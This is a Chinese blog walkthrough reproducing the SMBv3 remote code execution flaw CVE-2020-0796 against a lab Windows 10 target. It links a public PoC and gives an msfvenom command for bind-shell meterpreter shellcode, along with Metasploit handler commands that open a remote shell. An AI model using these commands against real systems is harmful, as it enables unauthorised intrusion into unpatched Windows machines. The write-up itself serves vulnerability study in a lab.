漏洞复现|CVE-2020-0796(SMBv3远程代码执行)漏洞复现

  • A+
所属分类:安全文章

目录

CVE-2020-0796

    漏洞描述

    漏洞危害等级        

    影响版本

    漏洞复现

    实现本地提权


CVE-2020-0796

漏洞描述

      2020年3月10日,微软在其官方SRC发布了CVE-2020-0796的安全公告(ADV200005,MicrosoftGuidance for Disabling SMBv3 Compression),公告表示在Windows SMBv3版本的客户端和服务端存在远程代码执行漏洞。同时指出该漏洞存在于MicroSoft Server Message Block 3.1.1协议处理特定请求包的功能中,攻击者利用该漏洞可在目标SMB Server或者Client中执行任意代码。

漏洞危害等级

影响版本

  • Windows 10 Version 1903 for 32-bit Systems

  • Windows 10 Version 1903 for x64-based Systems

  • Windows 10 Version 1903 for ARM64-based Systems

  •  Windows Server, Version 1903 (Server Core installation)

  • Windows 10 Version 1909 for 32-bit Systems

  • Windows 10 Version 1909 for x64-based Systems

  • Windows 10 Version 1909 for ARM64-based Systems

  • Windows Server, Version 1909 (Server Core installation)

漏洞复现

  • 靶机:192.168.10.26(Win10 1903版本)

  • Kali攻击机:192.168.10.13

漏洞复现|CVE-2020-0796(SMBv3远程代码执行)漏洞复现

POC地址:https://github.com/chompie1337/SMBGhost_RCE_PoC

先检测目标是否存在该漏洞

漏洞复现|CVE-2020-0796(SMBv3远程代码执行)漏洞复现

使用 msfvenom 生成 python 类型正向连接的 shellcode

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=8888 -b 'x00' -i 1 -f python

漏洞复现|CVE-2020-0796(SMBv3远程代码执行)漏洞复现

将生成的 shellcode 替换 POC 中 exploit.py 里的USER_PAYLOAD字段,注意要将buf替换为USER_PAYLOAD

漏洞复现|CVE-2020-0796(SMBv3远程代码执行)漏洞复现

MSF启动监听

   

use exploit/multi/handlerset payload windows/x64/meterpreter/bind_tcpset lport 8888set rhost 192.168.10.26run

POC发起攻击,攻击成功

漏洞复现|CVE-2020-0796(SMBv3远程代码执行)漏洞复现

注意:在用POC打的过程中,极易出现蓝屏或重启的风险,使用时应注意!

漏洞复现|CVE-2020-0796(SMBv3远程代码执行)漏洞复现

实现本地提权

漏洞复现|CVE-2020-0796(SMBv3远程代码执行)漏洞复现

漏洞检测和利用脚本:关注微信公众号:xie_sec ,后台回复:0796  即可下载。


漏洞复现|CVE-2020-0796(SMBv3远程代码执行)漏洞复现

漏洞复现|CVE-2020-0796(SMBv3远程代码执行)漏洞复现

来源:谢公子的博客

责编:Zuo

漏洞复现|CVE-2020-0796(SMBv3远程代码执行)漏洞复现

漏洞复现|CVE-2020-0796(SMBv3远程代码执行)漏洞复现
漏洞复现|CVE-2020-0796(SMBv3远程代码执行)漏洞复现
如果文中有错误的地方,欢迎指出。有想转载的,可以留言我加白名单。
最后,欢迎加入谢公子的小黑屋(安全交流群)(QQ群:783820465)
漏洞复现|CVE-2020-0796(SMBv3远程代码执行)漏洞复现
漏洞复现|CVE-2020-0796(SMBv3远程代码执行)漏洞复现

漏洞复现|CVE-2020-0796(SMBv3远程代码执行)漏洞复现

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: